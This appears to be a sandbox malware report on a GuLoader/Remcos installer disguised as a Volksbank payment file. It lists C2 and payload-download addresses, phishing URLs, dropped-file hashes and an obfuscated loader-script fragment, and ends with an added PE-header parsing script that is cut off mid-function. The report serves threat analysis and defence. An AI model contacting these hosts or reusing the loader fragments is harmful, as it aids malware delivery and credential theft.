10:44:55   API Interceptor   27250554x Sleep call for process: Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe modified
Match           Associated Sample Name / URL                                        Detection   Threat Name               Context
102.165.14.28   Benefit_Signature_Plan#3762.com.exe                                 malicious   Remcos, GuLoader          102.165.14.28/agwwRWrYKhF156.bin
178.237.33.50   Nutzen_Unterschrift_Planen#2024.com.exe                             malicious   Remcos, GuLoader          geoplugin.net/json.gp
                SERVICE OR PRODUCT DESRIPTION AND COMPANY PROFILE.SCR.exe           malicious   Remcos                    geoplugin.net/json.gp
                SecuriteInfo.com.Exploit.CVE-2017-11882.123.31506.1346.rtf          malicious   Remcos                    geoplugin.net/json.gp
                SecuriteInfo.com.Win32.Evo-gen.3521.549.exe                         malicious   Remcos                    geoplugin.net/json.gp
                sostener.vbs                                                        malicious   Remcos                    geoplugin.net/json.gp
                SecuriteInfo.com.Exploit.CVE-2017-11882.123.31177.14968.rtf         malicious   Remcos, PureLog Stealer   geoplugin.net/json.gp
                6122.scr.exe                                                        malicious   Remcos                    geoplugin.net/json.gp
                6122.scr.exe                                                        malicious   Remcos                    geoplugin.net/json.gp
                SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe                       malicious   Remcos                    geoplugin.net/json.gp
                https://maveuve.github.io/frlpodf/marynewreleasefax.html            malicious   Remcos                    geoplugin.net/json.gp
Match           Associated Sample Name / URL                                        Detection   Threat Name               Context
geoplugin.net   Nutzen_Unterschrift_Planen#2024.com.exe                             malicious   Remcos, GuLoader          178.237.33.50
                SERVICE OR PRODUCT DESRIPTION AND COMPANY PROFILE.SCR.exe           malicious   Remcos                    178.237.33.50
                SecuriteInfo.com.Exploit.CVE-2017-11882.123.31506.1346.rtf          malicious   Remcos                    178.237.33.50
                SecuriteInfo.com.Win32.Evo-gen.3521.549.exe                         malicious   Remcos                    178.237.33.50
                sostener.vbs                                                        malicious   Remcos                    178.237.33.50
                SecuriteInfo.com.Exploit.CVE-2017-11882.123.31177.14968.rtf         malicious   Remcos, PureLog Stealer   178.237.33.50
                6122.scr.exe                                                        malicious   Remcos                    178.237.33.50
                6122.scr.exe                                                        malicious   Remcos                    178.237.33.50
                SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe                       malicious   Remcos                    178.237.33.50
                Marys Organizer 2023 Release.zip                                    malicious   Remcos                    178.237.33.50
Match                        Associated Sample Name / URL                                                                                                          Detection   Threat Name               Context
ATOM86-ASATOM86NL            Nutzen_Unterschrift_Planen#2024.com.exe                                                                                               malicious   Remcos, GuLoader          178.237.33.50
                             SERVICE OR PRODUCT DESRIPTION AND COMPANY PROFILE.SCR.exe                                                                             malicious   Remcos                    178.237.33.50
                             SecuriteInfo.com.Exploit.CVE-2017-11882.123.31506.1346.rtf                                                                            malicious   Remcos                    178.237.33.50
                             SecuriteInfo.com.Win32.Evo-gen.3521.549.exe                                                                                           malicious   Remcos                    178.237.33.50
                             sostener.vbs                                                                                                                          malicious   Remcos                    178.237.33.50
                             SecuriteInfo.com.Exploit.CVE-2017-11882.123.31177.14968.rtf                                                                           malicious   Remcos, PureLog Stealer   178.237.33.50
                             6122.scr.exe                                                                                                                          malicious   Remcos                    178.237.33.50
                             6122.scr.exe                                                                                                                          malicious   Remcos                    178.237.33.50
                             SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe                                                                                         malicious   Remcos                    178.237.33.50
                             Marys Organizer 2023 Release.zip                                                                                                      malicious   Remcos                    178.237.33.50
ASDETUKhttpwwwheficedcomGB   https://my5353.com/saison919                                                                                                          malicious   Unknown                   181.214.58.20
                             #U0641#U0631#U0627#U062e#U0648#U0627#U0646 #U0631#U0648#U0632 #U06a9#U0627#U0631#U06af#U0631.exe                                     malicious   Unknown                   45.150.67.44
                             #U0631#U0648#U0632 #U0633#U06cc#U0627#U0647 #U06a9#U0627#U0631#U06af#U0631.exe                                                       malicious   Unknown                   45.150.67.44
                             #U0641#U0631#U0627#U062e#U0648#U0627#U0646 #U0631#U0648#U0632 #U06a9#U0627#U0631#U06af#U0631.exe                                     malicious   Unknown                   45.150.67.44
                             Inv_Doc_18#908.pdf                                                                                                                    malicious   Unknown                   191.101.79.65
                             https://teconstruyo.cl/o/?c3Y9bzM2NV8xX25vbSZyYW5kPVUxRkxTbWc9JnVpZD1VU0VSMTIwOTIwMjRVNDcwOTEyMzU=#dGNmb2lAb3RjLmdvdi51aw==          malicious   Unknown                   191.96.184.53
                             Inv_Doc_18#908.pdf                                                                                                                    malicious   Unknown                   191.101.79.65
                             https://spofity.serv00.net/spotify/auth/login.php                                                                                     malicious   Unknown                   102.165.14.4
                             System.exe                                                                                                                            malicious   Flesh Stealer, Xmrig      191.101.104.168
                             file_5822aee2333945a68f99cf2cfdd0e024_2024-09-16_14_28_33_034000.zip                                                                  malicious   Unknown
                                                                                                                                                                                                                      • 181.214.165.162
                                                                                                                                                                                                                      No context

Match: C:\Users\user\AppData\Local\Temp\nsf961A.tmp\System.dll

Associated Sample Name / URL | Detection | Threat Name
Nutzen_Unterschrift_Planen#2024.com.exe | malicious | Remcos, GuLoader
Nutzen_Unterschrift_Planen#2024.com.exe | malicious | GuLoader
Benefit_Signature_Plan#3762.com.exe | malicious | Remcos, GuLoader
Benefit_Signature_Plan#3762.com.exe | malicious | GuLoader
DHL SHIPPING DOCUMENTS.exe | malicious | Remcos, GuLoader
DHL SHIPPING DOCUMENTS.exe | malicious | GuLoader
Requesr for quotation-sample catalog.vbs | malicious | FormBook, GuLoader
Requesr for quotation-sample catalog.vbs | malicious | GuLoader
Zahteva za ponudbo #U2013 Katalog vzorcev.vbs | malicious | FormBook, GuLoader

Process: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe
File Type: JSON data
Category: dropped
Size (bytes): 963
Entropy (8bit): 5.006537195887613
Encrypted: false
SSDEEP: 12:tkW5nd66GkMyGWKyGXPVGArwY3NIFa5HEGYArpv/mOAaNO+ao9W7iN5zzkw76k+v:qW9dbauKyGX85ihvXhNlT3/7ucgWro
MD5: 9D328F38BE11F37E4C12E9339E2E4AF5
SHA1: DA5B22DD3704A90572470F46DEF05D4EFA8438AF
SHA-256: C2113BBCC37199ED1B143CCE086E7E81266D39B007D229A87188FA628840E591
SHA-512: CDA42C8EEDF2339A82F6970FFDDB42A7C4DEDE777A5CAF1549D5ABE812FF20A5D7CB23850EAD0D1265C3F77C25B93DBB05030C1FBA24F84396F5DDF808910E96
Malicious: false
Reputation: low
Preview:
{
 "geoplugin_request":"79.127.132.20",
 "geoplugin_status":200,
 "geoplugin_delay":"0ms",
 "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",
 "geoplugin_city":"Ashburn",
 "geoplugin_region":"Virginia",
 "geoplugin_regionCode":"VA",
 "geoplugin_regionName":"Virginia",
 "geoplugin_areaCode":"",
 "geoplugin_dmaCode":"511",
 "geoplugin_countryCode":"US",
 "geoplugin_countryName":"United States",
 "geoplugin_inEU":0,
 "geoplugin_euVATrate":false,
 "geoplugin_continentCode":"NA",
 "geoplugin_continentName":"North America",
 "geoplugin_latitude":"39.0469",
 "geoplugin_longitude":"-77.4903",
 "geoplugin_locationAccuracyRadius":"20",
 "geoplugin_timezone":"America\/New_York",
 "geoplugin_currencyCode":"USD",
 "geoplugin_currencySymbol":"$",
 "geoplugin_currencySymbol_UTF8":"$",
 "geoplugin_currencyConverter":0
}

Process: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe
File Type: ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 45
Entropy (8bit): 4.7748605961854445
Encrypted: false
SSDEEP: 3:FR3tWAAQLQIfLBJXlFGfv:/ktQkIPeH
MD5: 8B9FC0443D7E48145E2D4B37AFB2D37B
SHA1: 64A5718A478A38AC262D2E46DA81D0E88C122A0F
SHA-256: 4F743978EAD44260F895C983689D718E31CA826161C447D205021A9D3E010AFA
SHA-512: 5126DA1D29F662465241C8B51B95783DF3F88C8FEB8BB1B65DCF354738C48AAB4BFB6C0035DFE6B40FA03AE5AABA8F72F1C31343AEC7D4EDB9C6EBCC773CC3D3
Malicious: false
Reputation: low
Preview:
[ReBoot]
Ac=user32::EnumWindows(i r2 ,i 0)

Process: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe
File Type: Extensible storage engine DataBase, version 0x620, checksum 0xadd8c841, page size 32768, DirtyShutdown, Windows version 10.0
Category: dropped
Size (bytes): 41943040
Entropy (8bit): 1.4125380485612768
Encrypted: false
SSDEEP: 24576:3uzrC5wtPi9MkcMbyGyU1mVGPDQgGEpg9jokoiGsC7liREu2V0lfoBg:hw49lVyGyUDPDQgGTMu2
MD5: DF1B6C855969F96A517CBE66BC5A485A
SHA1: C93156A93B4340964E524D83F7C36DCA2C89C177
SHA-256: 3DC71DF887815AB94D574EB69C8611F95F9F13336DA12325A75FEBE8F79C41A5
SHA-512: CF97C372D4572952E11D12B2C9C6F13FE41C512C7F719954A3DD8E8CA47A41979CC88E123BE96DA76BFF2222AAB707E1C35EDC0265D8EA7534B39AEFBE02B185
Malicious: false
Reputation: low

Process: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe
File Type: Unicode text, UTF-16, little-endian text, with no line terminators
Category: dropped
Size (bytes): 2
Entropy (8bit): 1.0
Encrypted: false
SSDEEP: 3:Qn:Qn
MD5: F3B25701FE362EC84616A93A45CE9998
SHA1: D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
SHA-256: B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
SHA-512: 98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
Malicious: false
Reputation: high, very likely benign file
Preview: ..

Process: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe
File Type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 11776
Entropy (8bit): 5.659026618805001
Encrypted: false
SSDEEP: 192:eX24sihno00Wfl97nH6BenXwWobpWBTtvShJ5omi7dJWjOlqSlS:D8QIl972eXqlWBFSt273YOlqz
MD5: 9625D5B1754BC4FF29281D415D27A0FD
SHA1: 80E85AFC5CCCD4C0A3775EDBB90595A1A59F5CE0
SHA-256: C2F405D7402F815D0C3FADD9A50F0BBBB1BAB9AA38FE347823478A2587299448
SHA-512: DCE52B640897C2E8DBFD0A1472D5377FA91FB9CF1AEFF62604D014BCCBE5B56AF1378F173132ABEB0EDD18C225B9F8F5E3D3E72434AED946661E036C779F165B
Malicious: false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:
• Filename: Nutzen_Unterschrift_Planen#2024.com.exe, Detection: malicious
• Filename: Nutzen_Unterschrift_Planen#2024.com.exe, Detection: malicious
• Filename: Benefit_Signature_Plan#3762.com.exe, Detection: malicious
• Filename: Benefit_Signature_Plan#3762.com.exe, Detection: malicious
• Filename: DHL SHIPPING DOCUMENTS.exe, Detection: malicious
• Filename: DHL SHIPPING DOCUMENTS.exe, Detection: malicious
• Filename: Requesr for quotation-sample catalog.vbs, Detection: malicious
• Filename: Requesr for quotation-sample catalog.vbs, Detection: malicious
• Filename: Zahteva za ponudbo #U2013 Katalog vzorcev.vbs, Detection: malicious

Process: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe
File Type: ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 27
Entropy (8bit): 4.134336113194451
Encrypted: false
SSDEEP: 3:iGAeSMn:lAeZ
MD5: 7AB6006A78C23C5DEC74C202B85A51A4
SHA1: C0FF9305378BE5EC16A18127C171BB9F04D5C640
SHA-256: BDDCBC9F6E35E10FA203E176D28CDB86BA3ADD97F2CFFD2BDA7A335B1037B71D
SHA-512: 40464F667E1CDF9D627642BE51B762245FA62097F09D3739BF94728BC9337E8A296CE4AC18380B1AED405ADB72435A2CD915E3BC37F6840F34781028F3D8AED6
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Preview:[Access]..Setting=Enabled..
                                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):483068
                                                                                                                                                                                                                                        Entropy (8bit):1.2559621016997755
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:1536:Ts8u8aVK1ZlzjOxDzNWfy52aTmhK55zGW:K8sK1CnI855zj
                                                                                                                                                                                                                                        MD5:978130B080454EE75826E94EEFAC0DB6
                                                                                                                                                                                                                                        SHA1:EAAE2B3999D26409C2940341400BBBAB48469E17
                                                                                                                                                                                                                                        SHA-256:3BBDA07C56DE4470422589DD83FE0A6577965873EFA5C8E5E83FE4F1AA63DCDE
                                                                                                                                                                                                                                        SHA-512:82495569F36BBDAAD1148F0A690D46FA72473525529F0358DF93F50BE08AC15CFA4FCB80606C42EF8A53C0CCFF4B2D0DAEFA04C58D9C401DF53A82911D91F69E
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Preview:...............................................k.........x.................................K.................3.......................$.....>.....?.............;....(................................e..............G........I...............O...........................5..................X......................................................:...........*.I..o..............................................I............................................................................................................................."......................s.....................................................*..........3..r..............................................................................................................(...................................................................]...P.......................................:.....................?.......................................f............t.....................................................................E...........
                                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):398475
                                                                                                                                                                                                                                        Entropy (8bit):1.248847086664137
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:768:bkh4Sjk4H7mPNEmlFSqrgoqOZzoC4SaD7V3dMpWrsmTKup6S0HoEoe+gndJDu4u/:+rmPjodMgqouK0WcnEuKSZoP2XkqBO
                                                                                                                                                                                                                                        MD5:F1CF1E2735A25FA7063AD6B83B19FC89
                                                                                                                                                                                                                                        SHA1:FE722248A797FE002769CA18A81576296AB22403
                                                                                                                                                                                                                                        SHA-256:CA79D9C3C8F6BCA1C2312B3B03625465720F77FA069DF8822C001852D8320174
                                                                                                                                                                                                                                        SHA-512:C1E23B6F6F1C61434BE9B761D2012E3EBDBA7F570A81B014762EA132F5DE2AB99E0951307536640F546AFFC69759C0EFF0F4D0F58771F18EE2F3E2C984FABD95
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Preview:.....................................................E........*#......................................F............................I...........................................................................0.......................................u..........&............................f..........|...[......................S..........y..................r..............#.........[...................................7.........................t............................................x.............................|..............M.........................................................................................Hq..................................%.....................................................................................................\...................@..;..................................................q..@..................................K.............y........7.........2...........................l....................................S............................
                                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):217626
                                                                                                                                                                                                                                        Entropy (8bit):1.2578603206013297
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:768:XMKYdIEXJwxgkl3KvWaEjMQdp2TWrOr8URnzMazeE3hLOPf9BYgTtTkYCkkpMkNx:FlaopMDh0BmrkYin5Q
                                                                                                                                                                                                                                        MD5:3F90DDDD63AE098601831A6E980C14A0
                                                                                                                                                                                                                                        SHA1:4886FAB60F9408EA1A4AEB3ECD0DDFF3EE5CB6E4
                                                                                                                                                                                                                                        SHA-256:AC86AC0C331BD0885EFF6138AA0BFCBA447DCC32BF53C764A3B350A24C121C27
                                                                                                                                                                                                                                        SHA-512:54A5A11ACF41B7E0F8AD0765637FC9A0F376C61CA3630820F6C80424BC6B849999677EBA2046BCC2586A5081CA26E8C01338306E0E3D55CBAB9FD8A8830D07FA
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Preview:.......K..\....,............c........................#................v..5......................r................0...............................................@.................................|...N...I........b...l.................................v....................s....................................................P......N.........2................5..................................................................M.....Q..............i...H.............s....................M.................................................B............<..................=.........^..........'.....(......e...........................................................y................................................j...7............,...................................................................N^.....J...........................X............%.........=.............................4..............................gy...................................~.......... ..}..................................
                                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):288114
                                                                                                                                                                                                                                        Entropy (8bit):1.2434502885411884
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:768:6F9p3t3IrbTwRROFJIPoWbqZKVaCGQUOVKxKEhhKjarIY5LJyyL0bbQUMEQOUI5x:uq2MfCdaCMrG7kLgaRkjpZOzNBK
                                                                                                                                                                                                                                        MD5:6A1E16CBA1445D499AFE9EB6D8F6BEFC
                                                                                                                                                                                                                                        SHA1:189C2E83500790659F5BD0D2D7B21823A6D7D93F
                                                                                                                                                                                                                                        SHA-256:C800DF5007C632E89B1F61A7592F36E967BCAA8C37079C9BBDD2EDBBC5381A61
                                                                                                                                                                                                                                        SHA-512:81516187AAF31672E2B10183E73A3229FBD638B574E42C9B3ACC2388B4CFBA1F1C7184F9FE69521FA606306004697506A2783E1C98D3B458A18C4EEC8A0694B2
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Preview:..............................W..............................R..........U..............u........-..........................................k...................k..../...................N......................................H.W..O............................................................... .....................................................................................'.......................................a...........h.............................. ........................................g.....................$....................T....9..........................................................................................d..............<......-......................................................0..................... ..............=........8.......................................g................3..................B.....................?......................................................................^.......................s..........................................
                                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe
                                                                                                                                                                                                                                        File Type:Matlab v4 mat-file (little endian) , numeric, rows 10092776, columns 0
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):424413
                                                                                                                                                                                                                                        Entropy (8bit):1.2492169177560173
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:768:7Gx4c5hFkUmQbJLYe2jSB5rZDPdg2xnkwzIGn59Yrg/VhmvCQyjVjCC51kotL6PX:m59NMhxMJVZWiEeZnw/2zso55+EhOt
                                                                                                                                                                                                                                        MD5:3DF6AD4FBABFD56702AF1CF7EBA6B9CB
                                                                                                                                                                                                                                        SHA1:B473DD3797EC446C80EBAFC30F749939D1BAE334
                                                                                                                                                                                                                                        SHA-256:08539C762BBA9CAED2AD7EA548ED678763ECFC8C4A2162658301CA7D5E17E24F
                                                                                                                                                                                                                                        SHA-512:D7FA42CC6C6C8F49E74BD0A42B393BD23434601444C99C7F42F2D9AE59701ACFB9FB5F8700638A1C6B931810DB93823C7734393221E854881349D93DD44F30E7
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Preview:....................8..........@.............7........m.....V......(...............t...................p......................o........!.....................................................................................................r.....S..............................................q..L...d...............{................@...........................................................................).......................................................u............................................................................................ez.............B........}................$..........................c........................O.....p.......h.......................................Q.........................................X.................o....................?............................q.......<....................H.........U.................I.......................................................................Z.............................................}...}......
                                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (377), with no line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):377
                                                                                                                                                                                                                                        Entropy (8bit):4.247473738841439
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:6:2Vzd6gMnDQ9RF3T/S4AWoPt+1bMd+htV3iRGx4FVw0vYMXJ6KjYFeNgsW9+KT83N:2dsojL6PqbMdeViRGxQPDceNgsEmqBA
                                                                                                                                                                                                                                        MD5:A057E0CE882029EA5B564143C84FC55A
                                                                                                                                                                                                                                        SHA1:A86F7916A00CF922E1B01B69212029CF52037407
                                                                                                                                                                                                                                        SHA-256:C863E9D0414C2E8C1CF7014287D672DDCAEF38CF1ED91278BB9891820044251A
                                                                                                                                                                                                                                        SHA-512:8D606D6ED91E274AFAE731617751DB4C90334D572AD236F6C0490F6DF0C1CFDC2F17B8BDE97A5DFAFF5B5C04AE7EED9A23053A9A5758CDC1E84A2F786946A79B
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Preview:retveindbydendes plade lickety befavor varmeovnens.misprejudiced unreprieved tilgangsreguleringernes lossepladsernes stormpisket borg,taabeligheds marya vestigium rimy resultattavles processtyringer.departmentalization puerperalism afsaltendes valgerd stigningstakters brookier thyreoideal,labret ungkreatur omvej kohrerende bugtedes,designendes sadomasochists beskeler xylyls,
Process: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe
File Type: data
Category: dropped
Size (bytes): 296229
Entropy (8bit): 7.495538642487719
Encrypted: false
SSDEEP: 6144:vl2jMI/BQsdWiJ34eRHMC76wUDbfRwKH4wd9vJfDfyzJzZ6LRy1:vAdWgIhbH4wd9vNDuV6LRq
MD5: 076998B5DB516E7DD1352083B75C3867
SHA1: 6A8AD850ECEEFC42E9DC5BBAF1B6E3FA8430C125
SHA-256: 77F4A785D42C38CED298F98BE916A76AFC4333030C96AECB2EC726636CE0AAB4
SHA-512: A139D7C3211D5D8B657EB47196F475E54EB9D2186F569C2C072D796FA3DBD05BD90FD0D1989D687C8A070AADBB32089EE660D44184DD434E8FCB172C28249828
Malicious: false
                                                                                                                                                                                                                                        Preview:...].........GGG.oo.............XX......0....}.............V....wwww...............u...1.............4...............q....mmmmmmm.~~...S............XX...W.++...s...)))....ooo..&&&..........RR. .....................................++......UU.....................{{.......%...........lll........XXXX....ssssss.....cc.///.....qqqq..D.................................................}}.................D...................:............!.....A..<....................T....WWWW.......D...kk...KKK..........Z..W..www..4........H.................x.......Z.xx...........c....~~............KK....\........d......-....j.........i.....,,,,,...33..........c.{........:........[[[[...............W..........v...*.....[.LL.a...........................QQQ...@....oo.............XXXX..eee...............bbb.................X.......................{.^^^^........8..WW...............=.......K............]............... ..........4.r...........//.........L.v.........e...........J.ccc.....7......99.....................
Process: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe
File Type: data
Category: dropped
Size (bytes): 20011
Entropy (8bit): 4.608545325108019
Encrypted: false
SSDEEP: 384:goDwlL4a2PP/vhLlmNR0oECxvKyB9ZrpvECS7v7mSIsdyoRiSKH:gGi4JNl09yyvEjGlkIT
MD5: F13D4EB565AEA7914BF5916A70319C9C
SHA1: 255E6068FAFC917282B962E20D1F606C02108EB6
SHA-256: 9DB44F12533260E8D5A445B0023B1A4E529F5047F466909607543171E207BF15
SHA-512: 54AC471F48CC398650B43DCB39601C4AD94CDCC60D41F3FB1A31FB71A75A419A18F2C68796CDCDED271DC386EA103267D33FADDBB4ABA9A918B72F68BF50F8E0
Malicious: false
                                                                                                                                                                                                                                        Preview:................qqq.........-.....!!!.....2.9.........................<...5...88.........//...^k...e...r...n...e...l.]]3...2...:...:...C...r...e...a...t...e...F.w.i..Al..se.C.A...(...m... ...r...4..g .~.,... ...i... ...0...x...8...0.a.0...0..M0...0...0..t0...,... ..ai... ...0...,... ...p... ...0...,... ...i... ...4.==,... .M.i... .j.0...x...8...0...,.CC ...i..T ..70...)...i.......r...8...q...k...e...r...n...e...l...3...2.##:...:...S...e...t...F...i...l...e..rP...o...i.R.n...t...e...r..t(...i..P ...r...8...,... ...i..W ...2...3...0..n1...2... ...,... ...i... ...0...,...i... .330...)...i..$....r...4...q...k...e...r.".n...e...l...3...2...:...:...V...i...r...t...u...a...l.IIA...l...l...o...c...(...i... .660..r,..ki... ...3.t.9.}.5...1...4...1...1...2...,... ...i... ...0...x...3...0...0...0...,... ...i... ...0...x..)4...0...)...p.......r.E.2..9q...k../e...r.B.n...e...l...3.t.2...:.9.:...R...e.. a...d...F...i...l..7e...(..1i... ...r..%8...,... ...i.|| ...r..e2...,... ...i... ...3...9...5...1
File type: PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Entropy (8bit): 7.534822995965337
TrID:
• Win32 Executable (generic) a (10002005/4) 99.96%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe
File size: 830'698 bytes
MD5: 97249feaaa2dd67af540e7615533294c
SHA1: dbfde83716b7253d7640d2ae3b45774337ce5931
SHA256: bd4499ee1845b2eeadc364b26f6e5891aaa699945a1125e6fcceedaac87f9090
SHA512: c3dc5f9733e673f23d8d553e613a61fc9854a02f7f87a0305450cf34fb4f1c1be7ea011ac99fb1ee0a37a68a15ae6761948f2af9a5f03067cbf76a34568961a8
SSDEEP: 12288:BTuHVrQ4WOKO7gN9GB5VG7K+M6HmPXMi+LO6Y1DLWqTylvQ9IFHepohIxFt7hxXO:twh/7Hy7K+zsXMTwAMWR9hoRR7jKzjrf
TLSH: 6D0512057A30E48BC16E8A3405E3D03D8A725D346CB25A4F37B57B8E3D7275AB26B14B
                                                                                                                                                                                                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........!`G.@...@...@../OQ..@...@..I@../OS..@...c>..@..+F...@..Rich.@..........................PE..L...b..Y.................d....:....
Icon Hash: 8c07010123078f11
Entrypoint: 0x403350
Entrypoint Section: .text
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
DLL Characteristics: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp: 0x597FCC62 [Tue Aug 1 00:33:38 2017 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 4
OS Version Minor: 0
File Version Major: 4
File Version Minor: 0
Subsystem Version Major: 4
Subsystem Version Minor: 0
Import Hash: b34f154ec913d2d2c435cbd644e91687
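Two of the static fields above deserve a second look before reading the disassembly. DLL Characteristics advertises DYNAMIC_BASE, but Image File Characteristics says RELOCS_STRIPPED and the IMAGE_DIRECTORY_ENTRY_BASERELOC entry in the directory listing on this page is empty, so the loader has no relocation table to apply: the image is always mapped at 0x400000 and system ASLR does nothing for it, which is why the hard-coded addresses in the entry-point listing (007A8A2C, 0079FEE0) are safe for the author to use. The link timestamp of a Nullsoft installer belongs to the prebuilt NSIS stub that makensis copies into every installer, so it dates the NSIS release that was used, not the day this sample was assembled. The script below is an added example, not Joe Sandbox or NSIS code: it parses a PE32 header with struct alone and derives these fields and checks the way a reviewer would. The embedded header is constructed to mirror the values reported on this page; the five-section layout it assumes (.text, .rdata, .data, .ndata, .rsrc) and the section sizes are assumptions, since the page shows only which section holds the entry point and each populated directory.

```python
"""Static PE header triage (added example; not Joe Sandbox or NSIS code).

Parses the DOS, COFF and PE32 optional headers, the data directories and the
section table with struct alone, then answers what a reviewer asks of a
sandbox report's header fields: where the entry point lives, which section
backs each populated directory, when the stub was linked, and whether the
loader can actually randomise the image base.
"""
import struct
from datetime import datetime, timezone

IMAGE_FILE_RELOCS_STRIPPED = 0x0001
IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE = 0x0040
IMAGE_SCN_MEM_EXECUTE = 0x20000000
DIRECTORY_NAMES = ["EXPORT", "IMPORT", "RESOURCE", "EXCEPTION", "SECURITY",
                   "BASERELOC", "DEBUG", "ARCHITECTURE", "GLOBALPTR", "TLS",
                   "LOAD_CONFIG", "BOUND_IMPORT", "IAT", "DELAY_IMPORT",
                   "COM_DESCRIPTOR", "RESERVED"]
# PE32 optional header up to NumberOfRvaAndSizes (96 bytes); 16 (rva, size) pairs follow.
OPTIONAL_HDR_FMT = "<HBB" + "I" * 9 + "H" * 6 + "I" * 4 + "HH" + "I" * 6
SECTION_FMT = "<8sIIIIIIHHI"  # IMAGE_SECTION_HEADER, 40 bytes


def parse_pe(data: bytes) -> dict:
    """Return the header fields of a PE32 image; raise ValueError for anything else."""
    if data[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    _machine, nsections, timestamp, _, _, opt_size, characteristics = \
        struct.unpack_from("<HHIIIHH", data, coff)
    opt = coff + 20
    f = struct.unpack_from(OPTIONAL_HDR_FMT, data, opt)
    if f[0] != 0x10B:
        raise ValueError("only PE32 (magic 0x10b) is handled here")
    dirs = {DIRECTORY_NAMES[i]: struct.unpack_from("<II", data, opt + 96 + 8 * i)
            for i in range(min(f[29], 16))}
    sections = []
    for i in range(nsections):
        name, vsize, va, _, _, _, _, _, _, flags = \
            struct.unpack_from(SECTION_FMT, data, opt + opt_size + 40 * i)
        sections.append({"name": name.rstrip(b"\0").decode("ascii", "replace"),
                         "va": va, "vsize": vsize, "flags": flags})
    return {"timestamp": timestamp, "characteristics": characteristics,
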